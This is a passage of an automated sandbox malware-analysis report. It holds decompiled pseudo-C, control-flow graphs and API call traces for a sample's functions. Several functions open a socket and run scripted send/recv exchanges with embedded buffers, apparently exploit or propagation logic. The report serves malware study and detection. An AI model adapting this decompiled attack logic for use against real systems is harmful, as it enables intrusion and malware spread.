            • inet_addr.WS2_32(?), ref: 00401440
            • htons.WS2_32(?), ref: 00401451
            • socket.WS2_32(00000002,00000001,00000000), ref: 00401460
            • connect.WS2_32(00000000,?,00000010), ref: 00401478
            • closesocket.WS2_32(?), ref: 004014DE
            • send.WS2_32(?,?,00000000,00000000), ref: 00401552
            • closesocket.WS2_32(00000000), ref: 0040163B
              • Part of subcall function 00401310: closesocket.WS2_32(?), ref: 00401320
            • Sleep.KERNEL32(000003E8,?,?,?,00000000), ref: 0040164A
            Strings
            Memory Dump Source
            • Source File: 00000001.00000002.265562252.0000000000401000.00000020.00000001.01000000.00000005.sdmp, Offset: 00400000, based on PE: true
            • Associated: 00000001.00000002.265557684.0000000000400000.00000002.00000001.01000000.00000005.sdmpDownload File
            • Associated: 00000001.00000002.265568782.000000000040A000.00000002.00000001.01000000.00000005.sdmpDownload File
            • Associated: 00000001.00000002.265593246.000000000040B000.00000008.00000001.01000000.00000005.sdmpDownload File
            • Associated: 00000001.00000002.265600976.000000000040F000.00000008.00000001.01000000.00000005.sdmpDownload File
            • Associated: 00000001.00000002.265685545.0000000000431000.00000004.00000001.01000000.00000005.sdmpDownload File
            • Associated: 00000001.00000002.265724046.0000000000710000.00000002.00000001.01000000.00000005.sdmpDownload File
            Joe Sandbox IDA Plugin
            • Snapshot File: hcaresult_1_2_400000_THN6clTA6P.jbxd
            Yara matches
            Similarity
            • API ID: CountTickclosesocket$Sleep$Unothrow_t@std@@@__allrem__ehfuncinfo$??2@_ftolconnecthtonsinet_addrsendsocket
            • String ID: treeid$userid
            • API String ID: 1627863558-1952904777
            • Opcode ID: a795f5ef80919ddeb185117022999ef12c76f4afe28dc9b1c1f32bf7cae1b72b
            • Instruction ID: 9576392e324d7e05cb18ae900f54aa0921aaa15026424fab799db75fbc2103f8
            • Opcode Fuzzy Hash: a795f5ef80919ddeb185117022999ef12c76f4afe28dc9b1c1f32bf7cae1b72b
            • Instruction Fuzzy Hash: 1981BF715083429FD314DF65C8809ABB7E8AFC8704F008D3EF5D5A32A1DA399909CB6B
            Uniqueness

            Uniqueness Score: -1.00%

            Function 00401B70 Relevance: 29.9, APIs: 16, Strings: 1, Instructions: 148networkCOMMON
            Download Yara Rule

            Control-flow Graph

            • Executed
            • Not Executed
            control_flow_graph 206 401b70-401bc8 inet_addr htons socket 207 401d68-401d73 206->207 208 401bce-401bde connect 206->208 209 401d62-401d63 closesocket 208->209 210 401be4-401bf9 send 208->210 209->207 210->209 211 401bff-401c14 recv 210->211 211->209 212 401c1a-401c2f send 211->212 212->209 213 401c35-401c4a recv 212->213 213->209 214 401c50-401c7a send 213->214 214->209 215 401c80-401c95 recv 214->215 215->209 216 401c9b-401cd0 send 215->216 216->209 217 401cd6-401ceb recv 216->217 217->209 218 401ced-401cf2 217->218 218->209 219 401cf4-401cfd 218->219 220 401d4d-401d61 closesocket 219->220 221 401cff-401d34 send 219->221 221->209 222 401d36-401d4b recv 221->222 222->209 222->220
            C-Code - Quality: 47%
            			E00401B70(short _a4, intOrPtr _a8) {
				intOrPtr _v152;
				void _v1023;
				char _v1024;
				short _v1040;
				short _v1046;
				char _v1060;
				char _v1072;
				char _v1087;
				char _v1088;
				char _v1104;
				char _v1123;
				char _v1124;
				char _v1136;
				char _v1137;
				char _v1150;
				char _v1168;
				char _v1169;
				char _v1200;
				short _t25;
				char* _t27;
				char _t28;
				char _t29;
				char _t30;
				char* _t31;
				intOrPtr _t32;
				char _t34;
				short _t46;

				_v1024 = 0;
				_v1040 = 2;
				memset( &_v1023, 0, 0xff << 2);
				asm("stosw");
				asm("stosb");
				_t25 = _a4;
				_push(_t25);
				L004097D4();
				_v1040 = _t25;
				_push(_a8);
				L004097CE();
				_push(0);
				_push(1);
				_push(2);
				_v1046 = _t25;
				L004097C8();
				_t46 = _t25;
				if(_t46 == 0xffffffff) {
					L16:
					return 0;
				} else {
					_push(0x10);
					_push( &_v1060);
					_push(_t46);
					L004097C2();
					if(_t25 == 0xffffffff) {
						L15:
						_push(_t46);
						L004097B0();
						goto L16;
					} else {
						_push(0);
						_push(0x89);
						_push(0x42e544);
						_push(_t46);
						L004097BC();
						if(_t25 == 0xffffffff) {
							goto L15;
						} else {
							_push(0);
							_t27 =  &_v1072;
							_push(0x400);
							_push(_t27);
							_push(_t46);
							L004097B6();
							if(_t27 == 0xffffffff) {
								goto L15;
							} else {
								_push(0);
								_push(0x8c);
								_push(0x42e5d0);
								_push(_t46);
								L004097BC();
								if(_t27 == 0xffffffff) {
									goto L15;
								} else {
									_push(0);
									_push(0x400);
									_push( &_v1104);
									_push(_t46);
									L004097B6();
									if(_t27 == 0xffffffff) {
										goto L15;
									} else {
										_t28 = _v1088;
										_push(0);
										_t34 = _t28;
										 *0x42e67c = _t28;
										_t29 = _v1087;
										_push(0x60);
										_push(0x42e65c);
										_push(_t46);
										_v1137 = _t29;
										 *0x42e67d = _t29;
										L004097BC();
										if(_t29 == 0xffffffff) {
											goto L15;
										} else {
											_push(0);
											_push(0x400);
											_push( &_v1136);
											_push(_t46);
											L004097B6();
											if(_t29 == 0xffffffff) {
												goto L15;
											} else {
												_t30 = _v1124;
												_push(0);
												_push(0x52);
												_push(0x42e6bc);
												_push(_t46);
												 *0x42e6d8 = _t30;
												 *0x42e6d9 = _v1123;
												 *0x42e6dc = _t34;
												 *0x42e6dd = _v1169;
												L004097BC();
												if(_t30 == 0xffffffff) {
													goto L15;
												} else {
													_push(0);
													_t31 =  &_v1168;
													_push(0x400);
													_push(_t31);
													_push(_t46);
													L004097B6();
													if(_t31 == 0xffffffff || _v1150 != 0x51) {
														goto L15;
													} else {
														_t32 = _v152;
														if(_t32 != 0) {
															L14:
															_push(_t46);
															L004097B0();
															return 1;
														} else {
															_push(0);
															_push(0x52);
															_push(0x42e6bc);
															_push(_t46);
															 *0x42e6de = 0x42;
															 *0x42e6ed = 0xe;
															 *0x42e6ee = 0x69;
															 *0x42e6ef = 0;
															 *0x42e6f0 = 0;
															L004097BC();
															if(_t32 == 0xffffffff) {
																goto L15;
															} else {
																_push(0);
																_push(0x400);
																_push( &_v1200);
																_push(_t46);
																L004097B6();
																if(_t32 == 0xffffffff) {
																	goto L15;
																} else {
																	goto L14;
																}
															}
														}
													}
												}
											}
										}
									}
								}
							}
						}
					}
				}
			}






























            0x00401b84
            0x00401b89
            0x00401b90
            0x00401b92
            0x00401b94
            0x00401b95
            0x00401b9c
            0x00401b9d
            0x00401ba9
            0x00401bad
            0x00401bae
            0x00401bb3
            0x00401bb5
            0x00401bb7
            0x00401bb9
            0x00401bbe
            0x00401bc3
            0x00401bc8
            0x00401d6a
            0x00401d73
            0x00401bce
            0x00401bd2
            0x00401bd4
            0x00401bd5
            0x00401bd6
            0x00401bde
            0x00401d62
            0x00401d62
            0x00401d63
            0x00000000
            0x00401be4
            0x00401be4
            0x00401be6
            0x00401beb
            0x00401bf0
            0x00401bf1
            0x00401bf9
            0x00000000
            0x00401bff
            0x00401bff
            0x00401c01
            0x00401c05
            0x00401c0a
            0x00401c0b
            0x00401c0c
            0x00401c14
            0x00000000
            0x00401c1a
            0x00401c1a
            0x00401c1c
            0x00401c21
            0x00401c26
            0x00401c27
            0x00401c2f
            0x00000000
            0x00401c35
            0x00401c35
            0x00401c3b
            0x00401c40
            0x00401c41
            0x00401c42
            0x00401c4a
            0x00000000
            0x00401c50
            0x00401c50
            0x00401c54
            0x00401c56
            0x00401c58
            0x00401c5d
            0x00401c61
            0x00401c63
            0x00401c68
            0x00401c69
            0x00401c6d
            0x00401c72
            0x00401c7a
            0x00000000
            0x00401c80
            0x00401c80
            0x00401c86
            0x00401c8b
            0x00401c8c
            0x00401c8d
            0x00401c95
            0x00000000
            0x00401c9b
            0x00401c9b
            0x00401ca7
            0x00401ca9
            0x00401cab
            0x00401cb0
            0x00401cb1
            0x00401cb6
            0x00401cbc
            0x00401cc2
            0x00401cc8
            0x00401cd0
            0x00000000
            0x00401cd6
            0x00401cd6
            0x00401cd8
            0x00401cdc
            0x00401ce1
            0x00401ce2
            0x00401ce3
            0x00401ceb
            0x00000000
            0x00401cf4
            0x00401cf4
            0x00401cfd
            0x00401d4d
            0x00401d4d
            0x00401d4e
            0x00401d61
            0x00401cff
            0x00401cff
            0x00401d01
            0x00401d03
            0x00401d08
            0x00401d09
            0x00401d10
            0x00401d17
            0x00401d1e
            0x00401d25
            0x00401d2c
            0x00401d34
            0x00000000
            0x00401d36
            0x00401d36
            0x00401d3c
            0x00401d41
            0x00401d42
            0x00401d43
            0x00401d4b
            0x00000000
            0x00000000
            0x00000000
            0x00000000
            0x00401d4b
            0x00401d34
            0x00401cfd
            0x00401ceb
            0x00401cd0
            0x00401c95
            0x00401c7a
            0x00401c4a
            0x00401c2f
            0x00401c14
            0x00401bf9
            0x00401bde

            APIs
            • inet_addr.WS2_32(?), ref: 00401B9D
            • htons.WS2_32(?), ref: 00401BAE
            • socket.WS2_32(00000002,00000001,00000000), ref: 00401BBE
            • connect.WS2_32(00000000,00000002,00000010), ref: 00401BD6
            • send.WS2_32(00000000,0042E544,00000089,00000000), ref: 00401BF1
            • recv.WS2_32(00000000,?,00000400,00000000), ref: 00401C0C
            • send.WS2_32(00000000,0042E5D0,0000008C,00000000), ref: 00401C27
            • recv.WS2_32(00000000,?,00000400,00000000), ref: 00401C42
            • send.WS2_32(00000000,0042E65C,00000060,00000000), ref: 00401C72
            • recv.WS2_32(00000000,?,00000400,00000000), ref: 00401C8D
            • send.WS2_32(00000000,0042E6BC,00000052,00000000), ref: 00401CC8
            • recv.WS2_32(00000000,?,00000400,00000000), ref: 00401CE3
            • send.WS2_32(00000000,0042E6BC,00000052,00000000), ref: 00401D2C
            • recv.WS2_32(00000000,?,00000400,00000000), ref: 00401D43
            • closesocket.WS2_32(00000000), ref: 00401D4E
            • closesocket.WS2_32(00000000), ref: 00401D63
            Strings
            Memory Dump Source
            • Source File: 00000001.00000002.265562252.0000000000401000.00000020.00000001.01000000.00000005.sdmp, Offset: 00400000, based on PE: true
            • Associated: 00000001.00000002.265557684.0000000000400000.00000002.00000001.01000000.00000005.sdmpDownload File
            • Associated: 00000001.00000002.265568782.000000000040A000.00000002.00000001.01000000.00000005.sdmpDownload File
            • Associated: 00000001.00000002.265593246.000000000040B000.00000008.00000001.01000000.00000005.sdmpDownload File
            • Associated: 00000001.00000002.265600976.000000000040F000.00000008.00000001.01000000.00000005.sdmpDownload File
            • Associated: 00000001.00000002.265685545.0000000000431000.00000004.00000001.01000000.00000005.sdmpDownload File
            • Associated: 00000001.00000002.265724046.0000000000710000.00000002.00000001.01000000.00000005.sdmpDownload File
            Joe Sandbox IDA Plugin
            • Snapshot File: hcaresult_1_2_400000_THN6clTA6P.jbxd
            Yara matches
            Similarity
            • API ID: recvsend$closesocket$connecthtonsinet_addrsocket
            • String ID: Q
            • API String ID: 3338977835-3463352047
            • Opcode ID: 918350b7f53833d0cdbe9b3fd2039c60ef8492344bf5739ae3426028d4fc205b
            • Instruction ID: 56015dd6d43c65fb466be4e40c8692735ed6ec6497eec729d9a4b8ad7908288d
            • Opcode Fuzzy Hash: 918350b7f53833d0cdbe9b3fd2039c60ef8492344bf5739ae3426028d4fc205b
            • Instruction Fuzzy Hash: BE41F92125438064D23196395C42F9B36840F56728F944B3FF3A0B62E3D6BC990A836E
            Uniqueness

            Uniqueness Score: -1.00%

            Function 004072A0 Relevance: 24.6, APIs: 13, Strings: 1, Instructions: 137networkCOMMON
            Download Yara Rule

            Control-flow Graph

            • Executed
            • Not Executed
            control_flow_graph 223 4072a0-4072f8 inet_addr htons socket 224 40746c-407477 223->224 225 4072fe-40730e connect 223->225 226 407314-407329 send 225->226 227 407466-407467 closesocket 225->227 226->227 228 40732f-407344 recv 226->228 227->224 228->227 229 40734a-40735f send 228->229 229->227 230 407365-40737a recv 229->230 230->227 231 407380-4073a9 send 230->231 231->227 232 4073af-4073c4 recv 231->232 232->227 233 4073ca-407416 send 232->233 233->227 234 407418-40742d recv 233->234 234->227 235 40742f-407434 234->235 235->227 236 407436-407463 call 406eb0 call 406ed0 call 406f50 235->236 236->227
            C-Code - Quality: 43%
            			E004072A0(short _a4, intOrPtr _a8) {
				intOrPtr _v152;
				void _v1023;
				char _v1024;
				short _v1048;
				short _v1054;
				char _v1068;
				char _v1072;
				char _v1087;
				char _v1088;
				char _v1104;
				char _v1123;
				char _v1124;
				char _v1136;
				char _v1145;
				char _v1150;
				intOrPtr _v1162;
				intOrPtr _v1166;
				char _v1168;
				char _v1177;
				intOrPtr _v1188;
				short _t27;
				char* _t29;
				char _t30;
				char _t31;
				char* _t32;
				void* _t34;
				void* _t35;
				char _t37;
				char _t43;
				intOrPtr _t44;
				char _t48;
				short _t52;

				_v1024 = 0;
				_v1048 = 2;
				memset( &_v1023, 0, 0xff << 2);
				asm("stosw");
				asm("stosb");
				_t27 = _a4;
				_push(_t27);
				L004097D4();
				_v1048 = _t27;
				_push(_a8);
				L004097CE();
				_push(0);
				_push(1);
				_push(2);
				_v1054 = _t27;
				L004097C8();
				_t52 = _t27;
				if(_t52 == 0xffffffff) {
					L13:
					return 0;
				} else {
					_push(0x10);
					_push( &_v1068);
					_push(_t52);
					L004097C2();
					if(_t27 != 0xffffffff) {
						_push(0);
						_push(0x89);
						_push(0x42e544);
						_push(_t52);
						L004097BC();
						if(_t27 != 0xffffffff) {
							_push(0);
							_t29 =  &_v1072;
							_push(0x400);
							_push(_t29);
							_push(_t52);
							L004097B6();
							if(_t29 != 0xffffffff) {
								_push(0);
								_push(0x8c);
								_push(0x42e5d0);
								_push(_t52);
								L004097BC();
								if(_t29 != 0xffffffff) {
									_push(0);
									_push(0x400);
									_push( &_v1104);
									_push(_t52);
									L004097B6();
									if(_t29 != 0xffffffff) {
										_t37 = _v1088;
										_t30 = _v1087;
										_push(0);
										_push(0x60);
										_push(0x42e65c);
										_push(_t52);
										 *0x42e67c = _t37;
										_v1145 = _t30;
										 *0x42e67d = _t30;
										L004097BC();
										if(_t30 != 0xffffffff) {
											_push(0);
											_push(0x400);
											_push( &_v1136);
											_push(_t52);
											L004097B6();
											if(_t30 != 0xffffffff) {
												_t31 = _v1124;
												_t43 = _v1123;
												_t48 = _v1177;
												_push(0);
												_push(0x52);
												_push(0x42e6bc);
												_push(_t52);
												 *0x42e6d8 = _t31;
												 *0x42e6d9 = _t43;
												 *0x42e6dc = _t37;
												 *0x42e6dd = _t48;
												 *0x42e72c = _t31;
												 *0x42e72d = _t43;
												 *0x42e730 = _t37;
												 *0x42e731 = _t48;
												L004097BC();
												if(_t31 != 0xffffffff) {
													_push(0);
													_t32 =  &_v1168;
													_push(0x400);
													_push(_t32);
													_push(_t52);
													L004097B6();
													if(_t32 != 0xffffffff) {
														_t66 = _v1150 - 0x51;
														if(_v1150 == 0x51) {
															_t44 = _v1162;
															_push(_t44);
															_v1188 = _t44;
															_t34 = E00406EB0(_v1166);
															_t35 = E00406ED0(_v1166);
															_push(_v152);
															_push(_t35);
															_push(_t34);
															_push(_t52);
															E00406F50(_v152, _t66);
														}
													}
												}
											}
										}
									}
								}
							}
						}
					}
					_push(_t52);
					L004097B0();
					goto L13;
				}
			}



































            0x004072b4
            0x004072b9
            0x004072c0
            0x004072c2
            0x004072c4
            0x004072c5
            0x004072cc
            0x004072cd
            0x004072d9
            0x004072dd
            0x004072de
            0x004072e3
            0x004072e5
            0x004072e7
            0x004072e9
            0x004072ee
            0x004072f3
            0x004072f8
            0x0040746e
            0x00407477
            0x004072fe
            0x00407302
            0x00407304
            0x00407305
            0x00407306
            0x0040730e
            0x00407314
            0x00407316
            0x0040731b
            0x00407320
            0x00407321
            0x00407329
            0x0040732f
            0x00407331
            0x00407335
            0x0040733a
            0x0040733b
            0x0040733c
            0x00407344
            0x0040734a
            0x0040734c
            0x00407351
            0x00407356
            0x00407357
            0x0040735f
            0x00407365
            0x0040736b
            0x00407370
            0x00407371
            0x00407372
            0x0040737a
            0x00407380
            0x00407384
            0x00407388
            0x0040738a
            0x0040738c
            0x00407391
            0x00407392
            0x00407398
            0x0040739c
            0x004073a1
            0x004073a9
            0x004073af
            0x004073b5
            0x004073ba
            0x004073bb
            0x004073bc
            0x004073c4
            0x004073ca
            0x004073ce
            0x004073d2
            0x004073d6
            0x004073d8
            0x004073da
            0x004073df
            0x004073e0
            0x004073e5
            0x004073eb
            0x004073f1
            0x004073f7
            0x004073fc
            0x00407402
            0x00407408
            0x0040740e
            0x00407416
            0x00407418
            0x0040741a
            0x0040741e
            0x00407423
            0x00407424
            0x00407425
            0x0040742d
            0x0040742f
            0x00407434
            0x00407436
            0x0040743e
            0x00407442
            0x00407446
            0x0040744e
            0x0040745a
            0x0040745b
            0x0040745c
            0x0040745d
            0x0040745e
            0x00407463
            0x00407434
            0x0040742d
            0x00407416
            0x004073c4
            0x004073a9
            0x0040737a
            0x0040735f
            0x00407344
            0x00407329
            0x00407466
            0x00407467
            0x00000000
            0x00407467

            APIs
            • inet_addr.WS2_32(?), ref: 004072CD
            • htons.WS2_32(?), ref: 004072DE
            • socket.WS2_32(00000002,00000001,00000000), ref: 004072EE
            • connect.WS2_32(00000000,00000002,00000010), ref: 00407306
            • send.WS2_32(00000000,0042E544,00000089,00000000), ref: 00407321
            • recv.WS2_32(00000000,?,00000400,00000000), ref: 0040733C
            • send.WS2_32(00000000,0042E5D0,0000008C,00000000), ref: 00407357
            • recv.WS2_32(00000000,?,00000400,00000000), ref: 00407372
            • send.WS2_32(00000000,0042E65C,00000060,00000000), ref: 004073A1
            • recv.WS2_32(00000000,?,00000400,00000000), ref: 004073BC
            • send.WS2_32(00000000,0042E6BC,00000052,00000000), ref: 0040740E
            • recv.WS2_32(00000000,?,00000400,00000000), ref: 00407425
              • Part of subcall function 00406F50: GlobalAlloc.KERNEL32(00000040,0000180C), ref: 00406FEB
            • closesocket.WS2_32(00000000), ref: 00407467
            Strings
            Memory Dump Source
            • Source File: 00000001.00000002.265562252.0000000000401000.00000020.00000001.01000000.00000005.sdmp, Offset: 00400000, based on PE: true
            • Associated: 00000001.00000002.265557684.0000000000400000.00000002.00000001.01000000.00000005.sdmpDownload File
            • Associated: 00000001.00000002.265568782.000000000040A000.00000002.00000001.01000000.00000005.sdmpDownload File
            • Associated: 00000001.00000002.265593246.000000000040B000.00000008.00000001.01000000.00000005.sdmpDownload File
            • Associated: 00000001.00000002.265600976.000000000040F000.00000008.00000001.01000000.00000005.sdmpDownload File
            • Associated: 00000001.00000002.265685545.0000000000431000.00000004.00000001.01000000.00000005.sdmpDownload File
            • Associated: 00000001.00000002.265724046.0000000000710000.00000002.00000001.01000000.00000005.sdmpDownload File
            Joe Sandbox IDA Plugin
            • Snapshot File: hcaresult_1_2_400000_THN6clTA6P.jbxd
            Yara matches
            Similarity
            • API ID: recvsend$AllocGlobalclosesocketconnecthtonsinet_addrsocket
            • String ID: Q
            • API String ID: 1218961698-3463352047
            • Opcode ID: cb662b63a2df382ff587a87166ed6413b15eb1a746a20c7ca240325f9c442f70
            • Instruction ID: 2e96292fb4a78f44b5b8862e346268617696c9edad98e6c8d234679fc6e9890d
            • Opcode Fuzzy Hash: cb662b63a2df382ff587a87166ed6413b15eb1a746a20c7ca240325f9c442f70
            • Instruction Fuzzy Hash: BB413A7124934069D220AB398C81F9B3A944F56724F544B3FF2A0B72D3D6B89906876F
            Uniqueness

            Uniqueness Score: -1.00%

            Function 00401980 Relevance: 21.1, APIs: 14, Instructions: 141networkCOMMON
            Download Yara Rule

            Control-flow Graph

            • Executed
            • Not Executed
            control_flow_graph 243 401980-4019d7 inet_addr htons socket 244 401b56-401b60 243->244 245 4019dd-4019ed connect 243->245 246 401b50-401b51 closesocket 245->246 247 4019f3-401a05 send 245->247 246->244 247->246 248 401a0b-401a20 recv 247->248 248->246 249 401a26-401a38 send 248->249 249->246 250 401a3e-401a53 recv 249->250 250->246 251 401a59-401a88 call 4017b0 send 250->251 251->246 254 401a8e-401aa3 recv 251->254 254->246 255 401aa9-401b06 send 254->255 255->246 256 401b08-401b1d recv 255->256 256->246 257 401b1f-401b24 256->257 257->246 258 401b26-401b2b 257->258 258->246 259 401b2d-401b33 258->259 259->246 260 401b35-401b3a 259->260 260->246 261 401b3c-401b4f closesocket 260->261
            C-Code - Quality: 48%
            			E00401980(short _a4) {
				void _v1023;
				char _v1024;
				void* _v1040;
				short _v1046;
				char _v1060;
				char _v1072;
				char _v1087;
				char _v1088;
				char _v1104;
				char _v1117;
				char _v1118;
				char _v1119;
				char _v1120;
				char _v1123;
				char _v1124;
				char _v1136;
				char _v1137;
				char _v1138;
				char _v1168;
				char _v1169;
				char _v1170;
				char _v1172;
				intOrPtr _v1173;
				char _v1174;
				char _v1175;
				void* _t32;
				short _t33;
				char* _t35;
				void* _t37;
				char _t38;
				char _t39;
				char _t40;
				char _t41;
				char _t49;
				short _t56;
				short _t57;

				_v1024 = 0;
				_t32 = memset( &_v1023, 0, 0xff << 2);
				asm("stosw");
				asm("stosb");
				_t56 = _a4;
				_v1040 = 2;
				_push(_t56);
				L004097D4();
				_v1040 = _t32;
				_t33 = _a4;
				_push(_t33);
				L004097CE();
				_push(0);
				_push(1);
				_push(2);
				_v1046 = _t33;
				L004097C8();
				_t57 = _t33;
				if(_t57 == 0xffffffff) {
					L16:
					__eflags = 0;
					return 0;
				} else {
					_push(0x10);
					_push( &_v1060);
					_push(_t57);
					L004097C2();
					if(_t33 == 0xffffffff) {
						L15:
						_push(_t57);
						L004097B0();
						goto L16;
					} else {
						_push(0);
						_push(0x58);
						_push(0x42e3d0);
						_push(_t57);
						L004097BC();
						if(_t33 == 0xffffffff) {
							goto L15;
						} else {
							_push(0);
							_push(0x400);
							_push( &_v1072);
							_push(_t57);
							L004097B6();
							if(_t33 == 0xffffffff) {
								goto L15;
							} else {
								_push(0);
								_push(0x67);
								_push(0x42e42c);
								_push(_t57);
								L004097BC();
								if(_t33 == 0xffffffff) {
									goto L15;
								} else {
									_push(0);
									_t35 =  &_v1104;
									_push(0x400);
									_push(_t35);
									_push(_t57);
									L004097B6();
									_t66 = _t35 - 0xffffffff;
									if(_t35 == 0xffffffff) {
										goto L15;
									} else {
										_v1138 = _v1088;
										_push( &_v1138);
										_push(_t56);
										_v1137 = _v1087;
										_t37 = E004017B0(_t66);
										_push(0);
										_push(_t37);
										_push(0x42e494);
										_push(_t57);
										L004097BC();
										if(_t37 == 0xffffffff) {
											goto L15;
										} else {
											_push(0);
											_push(0x400);
											_push( &_v1136);
											_push(_t57);
											L004097B6();
											if(_t37 == 0xffffffff) {
												goto L15;
											} else {
												_t38 = _v1124;
												_t49 = _v1123;
												 *0x42e510 = _t38;
												 *0x42e512 = _t38;
												_t39 = _v1120;
												_v1170 = _t39;
												 *0x42e514 = _t39;
												_t40 = _v1119;
												_push(0);
												_v1169 = _t40;
												 *0x42e515 = _t40;
												_t41 = _v1117;
												_push(0x4e);
												_push(0x42e4f4);
												_push(_t57);
												 *0x42e511 = _t49;
												 *0x42e513 = _t49;
												 *0x42e516 = _v1118;
												 *0x42e517 = _t41;
												L004097BC();
												if(_t41 == 0xffffffff) {
													goto L15;
												} else {
													_push(0);
													_push(0x400);
													_push( &_v1168);
													_push(_t57);
													L004097B6();
													if(_t41 == 0xffffffff || _v1175 != 5 || _v1174 != 2 || _v1173 != 0 || _v1172 != 0xc0) {
														goto L15;
													} else {
														_push(_t57);
														L004097B0();
														return 1;
													}
												}
											}
										}
									}
								}
							}
						}
					}
				}
			}







































            0x00401993
            0x00401998
            0x0040199a
            0x0040199c
            0x0040199d
            0x004019a4
            0x004019ab
            0x004019ac
            0x004019b1
            0x004019b5
            0x004019bc
            0x004019bd
            0x004019c2
            0x004019c4
            0x004019c6
            0x004019c8
            0x004019cd
            0x004019d2
            0x004019d7
            0x00401b57
            0x00401b57
            0x00401b60
            0x004019dd
            0x004019e1
            0x004019e3
            0x004019e4
            0x004019e5
            0x004019ed
            0x00401b50
            0x00401b50
            0x00401b51
            0x00000000
            0x004019f3
            0x004019f3
            0x004019f5
            0x004019f7
            0x004019fc
            0x004019fd
            0x00401a05
            0x00000000
            0x00401a0b
            0x00401a0b
            0x00401a11
            0x00401a16
            0x00401a17
            0x00401a18
            0x00401a20
            0x00000000
            0x00401a26
            0x00401a26
            0x00401a28
            0x00401a2a
            0x00401a2f
            0x00401a30
            0x00401a38
            0x00000000
            0x00401a3e
            0x00401a3e
            0x00401a40
            0x00401a44
            0x00401a49
            0x00401a4a
            0x00401a4b
            0x00401a50
            0x00401a53
            0x00000000
            0x00401a59
            0x00401a65
            0x00401a69
            0x00401a6a
            0x00401a6b
            0x00401a6f
            0x00401a77
            0x00401a79
            0x00401a7a
            0x00401a7f
            0x00401a80
            0x00401a88
            0x00000000
            0x00401a8e
            0x00401a8e
            0x00401a94
            0x00401a99
            0x00401a9a
            0x00401a9b
            0x00401aa3
            0x00000000
            0x00401aa9
            0x00401aa9
            0x00401aad
            0x00401ab5
            0x00401aba
            0x00401abf
            0x00401ac3
            0x00401ac7
            0x00401acc
            0x00401ad0
            0x00401ad2
            0x00401ad6
            0x00401adb
            0x00401adf
            0x00401ae1
            0x00401ae6
            0x00401ae7
            0x00401aed
            0x00401af3
            0x00401af9
            0x00401afe
            0x00401b06
            0x00000000
            0x00401b08
            0x00401b08
            0x00401b0e
            0x00401b13
            0x00401b14
            0x00401b15
            0x00401b1d
            0x00000000
            0x00401b3c
            0x00401b3c
            0x00401b3d
            0x00401b4f
            0x00401b4f
            0x00401b1d
            0x00401b06
            0x00401aa3
            0x00401a88
            0x00401a53
            0x00401a38
            0x00401a20
            0x00401a05
            0x004019ed

            APIs
            • inet_addr.WS2_32(?), ref: 004019AC
            • htons.WS2_32(?), ref: 004019BD
            • socket.WS2_32(00000002,00000001,00000000), ref: 004019CD
            • connect.WS2_32(00000000,00000002,00000010), ref: 004019E5
            • send.WS2_32(00000000,0042E3D0,00000058,00000000), ref: 004019FD
            • recv.WS2_32(00000000,?,00000400,00000000), ref: 00401A18
            • send.WS2_32(00000000,0042E42C,00000067,00000000), ref: 00401A30
            • recv.WS2_32(00000000,?,00000400,00000000), ref: 00401A4B
              • Part of subcall function 004017B0: sprintf.MSVCRT ref: 004017E6
            • send.WS2_32(00000000,0042E494,00000000,00000000), ref: 00401A80
            • recv.WS2_32(00000000,?,00000400,00000000), ref: 00401A9B
            • send.WS2_32(00000000,0042E4F4,0000004E,00000000), ref: 00401AFE
            • recv.WS2_32(00000000,00000000,00000400,00000000), ref: 00401B15
            • closesocket.WS2_32(00000000), ref: 00401B3D
            • closesocket.WS2_32(00000000), ref: 00401B51
            Memory Dump Source
            • Source File: 00000001.00000002.265562252.0000000000401000.00000020.00000001.01000000.00000005.sdmp, Offset: 00400000, based on PE: true
            • Associated: 00000001.00000002.265557684.0000000000400000.00000002.00000001.01000000.00000005.sdmpDownload File
            • Associated: 00000001.00000002.265568782.000000000040A000.00000002.00000001.01000000.00000005.sdmpDownload File
            • Associated: 00000001.00000002.265593246.000000000040B000.00000008.00000001.01000000.00000005.sdmpDownload File
            • Associated: 00000001.00000002.265600976.000000000040F000.00000008.00000001.01000000.00000005.sdmpDownload File
            • Associated: 00000001.00000002.265685545.0000000000431000.00000004.00000001.01000000.00000005.sdmpDownload File
            • Associated: 00000001.00000002.265724046.0000000000710000.00000002.00000001.01000000.00000005.sdmpDownload File
            Joe Sandbox IDA Plugin
            • Snapshot File: hcaresult_1_2_400000_THN6clTA6P.jbxd
            Yara matches
            Similarity
            • API ID: recvsend$closesocket$connecthtonsinet_addrsocketsprintf
            • String ID:
            • API String ID: 2897817404-0
            • Opcode ID: 99f773f49429c09dd42ea4e67fbb642a1aacf232097be334d5ef740b5450ccb1
            • Instruction ID: a1df91ed12107c95754f13785544920260681e501ca594d7538f805ec802c2a0
            • Opcode Fuzzy Hash: 99f773f49429c09dd42ea4e67fbb642a1aacf232097be334d5ef740b5450ccb1
            • Instruction Fuzzy Hash: EA41FB2111938078D721A7394C41B9F7BA40F52728F540B2EF6E4772E3E3B8964A836F
            Uniqueness

            Uniqueness Score: -1.00%

            Function 00407A20 Relevance: 18.1, APIs: 12, Instructions: 130memoryCOMMON
            Download Yara Rule

            Control-flow Graph

            • Executed
            • Not Executed
            control_flow_graph 262 407a20-407a54 GlobalAlloc 263 407a56-407a5c 262->263 264 407a5d-407a6d GlobalAlloc 262->264 265 407a84 264->265 266 407a6f-407a83 GlobalFree 264->266 267 407a86-407a8d 265->267 268 407a94-407acd 267->268 269 407a8f 267->269 268->267 270 407acf-407aee CreateFileA 268->270 269->268 271 407af0-407b10 GlobalFree * 2 270->271 272 407b11-407b39 GetFileSize ReadFile 270->272 273 407b62-407b89 CloseHandle 272->273 274 407b3b-407b61 CloseHandle GlobalFree * 2 272->274
            C-Code - Quality: 97%
            			E00407A20() {
				void* _v4;
				void* _v8;
				long _v12;
				void* _t23;
				void* _t24;
				void* _t30;
				long _t32;
				void* _t51;
				signed int _t52;
				signed int _t53;
				signed int _t59;
				signed int _t60;
				signed int _t66;
				void* _t70;
				long _t75;
				void* _t82;
				void* _t85;
				long* _t88;

				_t88 =  &_v12;
				_v12 = 0;
				_v8 = 0;
				_v4 = 0;
				_t23 = GlobalAlloc(0x40, 0x50d800);
				 *0x70f864 = _t23;
				if(_t23 != 0) {
					_t24 = GlobalAlloc(0x40, 0x50d800);
					 *0x70f868 = _t24;
					if(_t24 != 0) {
						_t66 = 0;
						do {
							_t82 = 0x40b020;
							if(_t66 != 0) {
								_t82 = 0x40f080;
							}
							_t70 = 0x70f864[_t66];
							asm("sbb eax, eax");
							 *(_t88 + 0x10 + _t66 * 4) = _t70;
							_t52 = ( ~_t66 & 0x00008844) + 0x4060;
							_t53 = _t52 >> 2;
